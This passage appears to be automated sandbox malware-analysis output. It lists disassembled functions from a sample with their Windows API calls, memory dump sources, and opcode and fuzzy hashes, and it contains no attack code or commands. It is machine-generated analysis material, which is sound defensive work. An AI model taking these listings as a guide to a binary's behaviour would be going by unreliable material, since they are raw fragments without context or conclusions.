                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Long$MessageSendShow
                                          • String ID:
                                          • API String ID: 3688381893-0
                                          • Opcode ID: cd24e5426c96d44d4a7f8b964efee2fc7fa0d45c1b4c2f3f8fb3eb07190b31d9
                                          • Instruction ID: 799f39137f5f52045aecca97fab1c80b62ce69a3fc543ed0ffc5c003a9d17f9f
                                          • Opcode Fuzzy Hash: cd24e5426c96d44d4a7f8b964efee2fc7fa0d45c1b4c2f3f8fb3eb07190b31d9
                                          • Instruction Fuzzy Hash: 5E41F235A10104AFDB24CF28CD58FE9BBA5EB09364F15122AF999B73E0C371ED42DA40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E72051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 2db33fa9bec31540ad548eb82763a8de03f9ed8bae05e3d9029bd1af582c1855
                                          • Instruction ID: cd7e69a10f852b5aab075beab2ad2d339550c3e0b27d0774d95a3b93812abff3
                                          • Opcode Fuzzy Hash: 2db33fa9bec31540ad548eb82763a8de03f9ed8bae05e3d9029bd1af582c1855
                                          • Instruction Fuzzy Hash: 2141D032A002049FCB24DF78C881A5AB3E5EF89714F1595ACEA19FB391DA31AD01CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 76d069d338b80cf55d25338acacce8cfde2718ba0fec15de47143e74676e0f7a
                                          • Instruction ID: baf4d275da3b464599714efb5dfd114e718788abab21433b877a6f279035e678
                                          • Opcode Fuzzy Hash: 76d069d338b80cf55d25338acacce8cfde2718ba0fec15de47143e74676e0f7a
                                          • Instruction Fuzzy Hash: 6C41AE31A0961AEBCF059F65C844BEEB7B4FB05324F20961AE865B3291C7306D58CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetInputState.USER32 ref: 00EB38CB
                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00EB3922
                                          • TranslateMessage.USER32(?), ref: 00EB394B
                                          • DispatchMessageW.USER32(?), ref: 00EB3955
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB3966
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                          • String ID:
                                          • API String ID: 2256411358-0
                                          • Opcode ID: dc01d18e4c4d446e3876b5eb96921b573e6120377a83fe4a74e6a56e34579d24
                                          • Instruction ID: c6728e7153dd4feb5041d68c68f5db282ea6e8817dee8268f75e6e9e142d2f22
                                          • Opcode Fuzzy Hash: dc01d18e4c4d446e3876b5eb96921b573e6120377a83fe4a74e6a56e34579d24
                                          • Instruction Fuzzy Hash: 1131F770504346AEEB35CB35AC4ABF737A8EB45308F14556EE562F20E4E7B0A684DB11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EBCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00EBCF38
                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00EBCF6F
                                          • GetLastError.KERNEL32 ref: 00EBCFB4
                                          • SetEvent.KERNEL32 ref: 00EBCFC8
                                          • SetEvent.KERNEL32 ref: 00EBCFF2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                          • String ID:
                                          • API String ID: 3191363074-0
                                          • Opcode ID: 2059aa5d18ae9d6ab5787b9506b36c4a3e77ffec667021bf03a589cfc5225171
                                          • Instruction ID: ebd7083ffc46257bbc1cc54fab4837c6c59a6fdefd3c0d55717972259e33a59b
                                          • Opcode Fuzzy Hash: 2059aa5d18ae9d6ab5787b9506b36c4a3e77ffec667021bf03a589cfc5225171
                                          • Instruction Fuzzy Hash: AC317F71608206AFDB20DFA5D884AFBBBF9EB04355B20546EF506F2110DB30ED44DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00ED5745
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00ED579D
                                          • _wcslen.LIBCMT ref: 00ED57AF
                                          • _wcslen.LIBCMT ref: 00ED57BA
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00ED5816
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$_wcslen
                                          • String ID:
                                          • API String ID: 763830540-0
                                          • Opcode ID: 7853552fc24abcfea64eb0c5ac2e4d8574659fcff593a9d0fdde61b70bbf8ef4
                                          • Instruction ID: 28abeefc88f35858909d67efaf2f1050308fd46c2695c9a7c6265eae038dc50d
                                          • Opcode Fuzzy Hash: 7853552fc24abcfea64eb0c5ac2e4d8574659fcff593a9d0fdde61b70bbf8ef4
                                          • Instruction Fuzzy Hash: 4A218272904618DADB209FA4DC85AEE77B8FF44764F109217F929FA2C0D7708986CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindow.USER32(00000000), ref: 00EC0951
                                          • GetForegroundWindow.USER32 ref: 00EC0968
                                          • GetDC.USER32(00000000), ref: 00EC09A4
                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00EC09B0
                                          • ReleaseDC.USER32(00000000,00000003), ref: 00EC09E8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$ForegroundPixelRelease
                                          • String ID:
                                          • API String ID: 4156661090-0
                                          • Opcode ID: 3d5ec06e6be6a2ec547238e01b0d41292d55be7854571635f366bf40965ef50d
                                          • Instruction ID: 850208b914a90bea2fc945abd24a45b807ec483a6b797e2048a9e1ebefe1b1ad
                                          • Opcode Fuzzy Hash: 3d5ec06e6be6a2ec547238e01b0d41292d55be7854571635f366bf40965ef50d
                                          • Instruction Fuzzy Hash: D5216F35600214AFD704EF65D984AAFBBF9EF84740F14806DE85AA7752CB34EC05CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 00E7CDC6
                                          • WideCharToMultiByte.KERNEL32 ref: 00E7CDE9
                                            • Part of subcall function 00E73820: RtlAllocateHeap.NTDLL(00000000,?,00F11444,?,00E5FDF5,?,?,00E4A976,00000010,00F11440,00E413FC,?,00E413C6,?,00E41129), ref: 00E73852
                                          • WideCharToMultiByte.KERNEL32 ref: 00E7CE0F
                                          • _free.LIBCMT ref: 00E7CE22
                                          • FreeEnvironmentStringsW.KERNEL32 ref: 00E7CE31
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: c58959ed0bd31555cc24c1f37f192f614d9c16f963797cbd41cebdafb5746c4c
                                          • Instruction ID: 2bc6deab2bb7af8136acedee3283433536b9666fe269d0baed958d564dc1eb13
                                          • Opcode Fuzzy Hash: c58959ed0bd31555cc24c1f37f192f614d9c16f963797cbd41cebdafb5746c4c
                                          • Instruction Fuzzy Hash: B701D8726026157F272116B76C48C7F6B6DDFC6BA5335912EFA0DF7100DA608D0281B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E59639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: 02d8046ec9496c37e41cfc7a31732ca4a9a44cd749eac77ec1b447dd00859b99
                                          • Instruction ID: 96edd93b0ff5e1762962b1063070f3ed5d6b03a05127e4a10152ee35680e4a56
                                          • Opcode Fuzzy Hash: 02d8046ec9496c37e41cfc7a31732ca4a9a44cd749eac77ec1b447dd00859b99
                                          • Instruction Fuzzy Hash: CD217F7080230AEFDB119F25EC157E97BB9FB0039AF518616F920B61A1D3B4589DEF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: 4623e1739c9d2d9416b92bf413b6ed4ce56eae1b2a4949f867b583ac571056a9
                                          • Instruction ID: 7cd66e6c8aa6c6658acfb82ecf304b474b2c4f2f2ee5da72dfcea1b05c795d9e
                                          • Opcode Fuzzy Hash: 4623e1739c9d2d9416b92bf413b6ed4ce56eae1b2a4949f867b583ac571056a9
                                          • Instruction Fuzzy Hash: 5E019663681B15FAD21896109D42EFA639CDB263A8B046423FD16BE741F760FD2182A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E72DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: 2d4d0de93ead581d67fed9c760db22bc915cd0da44522163cc3e24a8fe00e94a
                                          • Instruction ID: 19c694f109b8a64850f39f713806696a292162cfa5efd4de4476ca35cfdaec15
                                          • Opcode Fuzzy Hash: 2d4d0de93ead581d67fed9c760db22bc915cd0da44522163cc3e24a8fe00e94a
                                          • Instruction Fuzzy Hash: 2D01F4326056017BCA1327357C45D6B2699EBC57A9B34E12DFA2DB22D7EF608C455120
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: 96121ec54e96c2ce0623c10d480e5f7ad02d8d1ccccee6345f4d8435bf5f95ca
                                          • Instruction ID: 7444c391303644cf44aa893cc0f81cbe286243414928a68390714c92e92bf72a
                                          • Opcode Fuzzy Hash: 96121ec54e96c2ce0623c10d480e5f7ad02d8d1ccccee6345f4d8435bf5f95ca
                                          • Instruction Fuzzy Hash: 0E01DF76601205BFDB114F69EC84FAA7BAEEB48391F205525F901FA210D770ED04EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00EAE997
                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 00EAE9A5
                                          • Sleep.KERNEL32(00000000), ref: 00EAE9AD
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00EAE9B7
                                          • Sleep.KERNEL32 ref: 00EAE9F3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: f9a13e6ec150ada6519e59df6a1252185b470ecd992cbc07d43dc29173e75878
                                          • Instruction ID: e3d63f35112c54a2666c8e82089d6d7e4d206e70a9d1a55f17bfa369f46f7330
                                          • Opcode Fuzzy Hash: f9a13e6ec150ada6519e59df6a1252185b470ecd992cbc07d43dc29173e75878
                                          • Instruction Fuzzy Hash: 59011E31C02629DBCF049BE5E8596DEBBB8FB4E701F101596D502B6251CB30A555C761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EA1114
                                          • GetLastError.KERNEL32 ref: 00EA1120
                                          • GetProcessHeap.KERNEL32 ref: 00EA112F
                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00EA0B9B,?,?,?), ref: 00EA1136
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EA114D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          • Opcode ID: 31454a0a9608b3db796ffc5d33f8fc8f3d3ff7ca17912d6e98bb23ef8a9baadf
                                          • Instruction ID: 47d7a2c050437b53b17b8c7ff0b2009dba360d369c0c3795d0176d19cc3eef03
                                          • Opcode Fuzzy Hash: 31454a0a9608b3db796ffc5d33f8fc8f3d3ff7ca17912d6e98bb23ef8a9baadf
                                          • Instruction Fuzzy Hash: 4A016D75102216BFDB114F65EC49A6A3B7EEF8A3A4B200456FA41E7350DA31DC40DA60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32 ref: 00EA0FCA
                                          • GetLastError.KERNEL32 ref: 00EA0FD6
                                          • GetProcessHeap.KERNEL32 ref: 00EA0FE5
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EA0FEC
                                          • GetTokenInformation.ADVAPI32 ref: 00EA1002
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 02ff084c8d1b68331c6aa745fc8bd3d8b14f42a238fe9d2d0555106af9166e73
                                          • Instruction ID: 7c77fcc91fead49e183515841903845c7a65768db442f8b3c8d980066b8ca2d7
                                          • Opcode Fuzzy Hash: 02ff084c8d1b68331c6aa745fc8bd3d8b14f42a238fe9d2d0555106af9166e73
                                          • Instruction Fuzzy Hash: B1F0C235102312EFD7210FA5EC8DF563B6EEF8A7A1F210455F905EB290CA30EC40CA60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32 ref: 00EA102A
                                          • GetLastError.KERNEL32 ref: 00EA1036
                                          • GetProcessHeap.KERNEL32 ref: 00EA1045
                                          • HeapAlloc.KERNEL32(00000000,?,00000003,?,00000000,?), ref: 00EA104C
                                          • GetTokenInformation.ADVAPI32 ref: 00EA1062
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 18516ab73edff971aeb3cb4e5f38c300e2424b85c7d698aa45adb3b07ecd351a
                                          • Instruction ID: 46cb90a7561caadf5b62cc306215be335a7b23694a0d98121feeb7d4df6a8802
                                          • Opcode Fuzzy Hash: 18516ab73edff971aeb3cb4e5f38c300e2424b85c7d698aa45adb3b07ecd351a
                                          • Instruction Fuzzy Hash: 11F0C235102312EFD7211FA5EC48F563B6DEF8A7A1F200455F905EB290CA70E840DA60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: f426876a7d5014a6726304705876ebb49322127cf1dce596496e5d73ae446639
                                          • Instruction ID: 78392f5885e1dd9961208f84140a4a92bd5d30d7fb00fb11d704c16a696bcd54
                                          • Opcode Fuzzy Hash: f426876a7d5014a6726304705876ebb49322127cf1dce596496e5d73ae446639
                                          • Instruction Fuzzy Hash: 8F019872801B159FCB30AF66D890857FBF9BF602193159A3FD19662931C7B1B998CE80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00E7D752
                                            • Part of subcall function 00E729C8: HeapFree.KERNEL32(00000000,00000000), ref: 00E729DE
                                            • Part of subcall function 00E729C8: GetLastError.KERNEL32 ref: 00E729F0
                                          • _free.LIBCMT ref: 00E7D764
                                          • _free.LIBCMT ref: 00E7D776
                                          • _free.LIBCMT ref: 00E7D788
                                          • _free.LIBCMT ref: 00E7D79A
                                          Memory Dump Source
